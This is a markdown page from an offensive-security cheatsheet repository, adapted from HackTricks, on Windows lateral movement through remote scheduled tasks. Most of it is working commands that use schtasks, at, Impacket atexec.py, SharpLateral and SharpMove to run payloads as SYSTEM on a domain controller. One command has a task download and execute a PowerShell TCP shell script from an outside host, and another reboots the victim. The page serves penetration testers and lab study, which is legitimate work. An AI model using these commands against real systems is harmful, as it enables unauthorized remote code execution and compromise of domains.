daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

atexec.md (3688B)


      1 ---
      2 title: "AtExec / SchtasksExec"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/lateral-movement/atexec.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/lateral-movement/atexec.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # AtExec / SchtasksExec
     14 
     15 ## How it works
     16 
     17 With administrative access to a Windows host, an operator can create and start a scheduled task remotely. The `/S` option selects the remote host, `/U` and `/P` supply credentials for creating the task when needed, and `/RU` selects the account under which the task runs. The command referenced by `/TR` must exist on the remote system.<sup>[[1]](#references)</sup>
     18 
     19 The older `at` command can also schedule a command on a remote host when the Schedule service is running. It executes scheduled jobs under the service account, which is commonly `SYSTEM`:<sup>[[5]](#references)</sup>
     20 
     21 ```batch
     22 at \\victim 23:00 shutdown -r
     23 ```
     24 
     25 Create the task and then start it:
     26 
     27 ```bash
     28 schtasks /create /S <VICTIM> /TN <TASK_NAME> /TR C:\path\executable.exe /SC ONCE /ST 23:00 /RU SYSTEM
     29 schtasks /run /S <VICTIM> /TN <TASK_NAME>
     30 ```
     31 
     32 For example:
     33 
     34 ```bash
     35 schtasks /create /S dcorp-dc.domain.local /SC ONCE /ST 23:00 /RU SYSTEM /TN MyNewTask /TR C:\Windows\Temp\payload.exe
     36 schtasks /run /S dcorp-dc.domain.local /TN MyNewTask
     37 ```
     38 
     39 For a recurring weekly task, use a valid weekly schedule and specify the day explicitly:
     40 
     41 ```batch
     42 schtasks /create /S dcorp-dc.domain.local /SC WEEKLY /D MON /ST 23:00 /RU SYSTEM /TN MyWeeklyTask /TR C:\Windows\Temp\payload.exe
     43 schtasks /run /S dcorp-dc.domain.local /TN MyWeeklyTask
     44 ```
     45 
     46 A task action can also invoke PowerShell directly. The following lab example downloads and runs a script; host the payload only on infrastructure authorized for the assessment:
     47 
     48 ```batch
     49 schtasks /create /S dcorp-dc.domain.local /SC ONCE /ST 23:00 /RU SYSTEM /TN MyNewTask /TR "powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/InvokePowerShellTcp.ps1')\""
     50 schtasks /run /S dcorp-dc.domain.local /TN MyNewTask
     51 ```
     52 
     53 Impacket's `atexec.py` automates remote command execution through the Task Scheduler service and accepts password, NTLM-hash, or Kerberos authentication.<sup>[[2]](#references)</sup>
     54 
     55 ```bash
     56 atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
     57 ```
     58 
     59 SharpLateral provides a scheduled-task execution method:<sup>[[3]](#references)</sup>
     60 
     61 ```bash
     62 SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
     63 ```
     64 
     65 SharpMove provides another Task Scheduler implementation:<sup>[[4]](#references)</sup>
     66 
     67 ```bash
     68 SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
     69 ```
     70 
     71 More information about the [**use of schtasks with silver tickets here**](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket#host).
     72 
     73 Remove testing tasks after use:
     74 
     75 ```bash
     76 schtasks /delete /S <VICTIM> /TN <TASK_NAME> /F
     77 ```
     78 
     79 ## References
     80 
     81 - [1] [Microsoft Learn - schtasks create](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create)
     82 - [2] [Fortra Impacket - atexec.py](https://github.com/fortra/impacket/blob/master/examples/atexec.py)
     83 - [3] [SharpLateral](https://github.com/mertdas/SharpLateral)
     84 - [4] [SharpMove](https://github.com/0xthirteen/SharpMove)
     85 - [5] [Microsoft Learn - `at` command](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/at)